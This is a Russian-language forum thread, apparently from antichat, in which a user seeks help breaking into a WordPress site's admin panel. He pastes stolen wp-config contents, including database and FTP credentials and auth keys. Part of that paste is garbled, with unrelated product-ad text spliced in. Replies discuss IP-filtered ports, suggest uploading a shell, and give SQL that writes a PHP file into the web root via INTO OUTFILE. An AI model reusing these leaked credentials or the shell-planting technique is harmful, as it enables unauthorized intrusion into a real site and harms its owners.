вытащил с базы админа,он там всего 1 . но при переходе в админку требуется дополнительная авторизация https://prnt.sc/qvqeam главный пароль туда не походит.

Но в бд нашел такие данные что ниже,для чего они требуются,понимаю что к базе,но как их правильно заюзать не понимаю.как можно войти в админку ?

через фтп клиент пробовал подключиться указав домен сайта,также пробовал ip домена указать но Winscp не конектит даже к домену(ип)

* This file is used by the wp-config.php creation script during the\r\n * installation. You don't have to use the web site, you can just copy this file\r\n * to ""wp-config.php"" and fill in the values.\r\n *\r\n * @package (https://antichat.live/members/206396/) WordPress\r\n */\r\n\r\n// ** MySQL settings - You can get this info from your web host ** //\r\n/** The name of the database for WordPress */\r\ndefine('DB_NAME', 'tvma_wrdp2');\r\n\r\n/** MySQL database username */\r\ndefine('DB_USER', 'tvmma_wrdp2');\r\n\r\n/** MySQL database password */\r\ndefine('DB_PASSWORD', 'eKNo1gdSoz3');\r\n\r\n/** MySQL hostname */\r\ndefine('DB_HOST', 'mysql.dol-hos.com');\r\n\r\n/** Database Charset to use in creating database tables. */\r\ndefine('DB_CHARSET', 'utf8');\r\n\r\n/** The Database Collate type. Don't change this if in doubt. */\r\ndefine('DB_COLLATE', '');\r\n/**define('WP_ALLOW_REPAIR', true);\r\n\r\n/**#@+\r\n * Authentication Unique Keys.\r\n *\r\n * Change these to different unique phrases!\r\n * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/ WordPress.org secret-key service}\r\n * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.\r\n *\r\n * @since 2.6.0\r\n */\r\ndefine('AUTH_KEY', 'f7sXx[1B@LBwlsd{A56y>+eKNsoz3Xz iq\\\\Ms}?(;_a#ypaR5\\'3wFL~1X');\r\ndefine('SECUR E_AUTH_KEY', '-\\""r6413E1d>}MdG1lh@tR!QPU%/!S_6;CjO0}^>6zx7No4Frj2oz3+ OG\r\n\tCelebratedItalian industrial designer Antonio Citterio partnered with Flos to create the 50th Anniversary Limited Edition Kelvin LED table lamp. The award-winning designer and architect has designed lighting and furniture for a host of leading manufacturers, including Flos, Kartell, B&B Italia and many more

hashfinderboss said:
↑ (https://antichat.live/posts/4360999/)
через фтп клиент пробовал подключиться указав домен сайта,также пробовал ip домена указать но Winscp не конектит даже к домену(ип)


А там вообще FTP-порт открыт?

fandor9 said:
↑ (https://antichat.live/posts/4361103/)
А там вообще FTP-порт открыт?


чекнул в онлайн чекере написано открыт только 21 и 443 порт.какияе могут быть варианты?

hashfinderboss said:
↑ (https://antichat.live/posts/4361206/)
чекнул в онлайн чекере написано открыт только 21 и 443 порт.какияе могут быть варианты?




hashfinderboss said:
↑ (https://antichat.live/posts/4360999/)
define('FTP_HOST', 'web2.c-host.com');\r\ndefine('FTP_USER', 'wsdme');\r\ndefine('FTP_PASS', 'shazd34')


Вы же вот эти данные используете, так?

hashfinderboss said:
↑ (https://antichat.live/posts/4361206/)
чекнул в онлайн чекере написано открыт только 21 и 443 порт.какияе могут быть варианты?


Открыт то он открыт, только транспорт по нему доступен не всем ip, что боле вероятно. Если это правило работает для скрипта Wordpress то скорее всего, только ему доступ и открыт. Как Вы получили содержимое этого файла вообще загадка.

molemime said:
↑ (https://antichat.live/posts/4361732/)
Открыт то он открыт, только транспорт по нему доступен не всем ip, что боле вероятно. Если это правило работает для скрипта Wordpress то скорее всего, только ему доступ и открыт. Как Вы получили содержимое этого файла вообще загадка.


порт кстати не открыт, а фильтруется. Так что скорее всего именно так как вы и говорите.

fandor9 said:
↑ (https://antichat.live/posts/4361360/)
Вы же вот эти данные используете, так?


да

molemime said:
↑ (https://antichat.live/posts/4361732/)
Открыт то он открыт, только транспорт по нему доступен не всем ip, что боле вероятно. Если это правило работает для скрипта Wordpress то скорее всего, только ему доступ и открыт. Как Вы получили содержимое этого файла вообще загадка.


кроме того как зайти через ип админа,можно ли это обойти,имея бд ?

hashfinderboss said:
↑ (https://antichat.live/posts/4361926/)
кроме того как зайти через ип админа,можно ли это обойти,имея бд ?


Фильтрация ip и данные в бд совсем разные вещи. Грубо говоря никак.

Честно не пойму: зачем админка если есть доступ к бд...

molemime said:
↑ (https://antichat.live/posts/4361929/)
Фильтрация ip и данные в бд совсем разные вещи. Грубо говоря никак.
Честно не пойму: зачем админка если есть доступ к бд...


Шелл лить

BabaDook said:
↑ (https://antichat.live/posts/4361934/)
Шелл лить


Если шелл надо залить, можно попробовать средствами sql, идея бред конечно, но если с правами поднапутанно, то может получиться

.SpoilerTarget" type="button">Spoiler


PHP:
insert into `wp_posts` (`post_content`,`post_ti tle`,`post_excerpt`,`to_ping`,`pinged`,`post_conte nt_filtered`) values ('','1','0','0','0','0');
select `post_content` from `wp_posts` order� �by ID desc limit 1 into outfile '/var/www/html/wordpress/wp.php';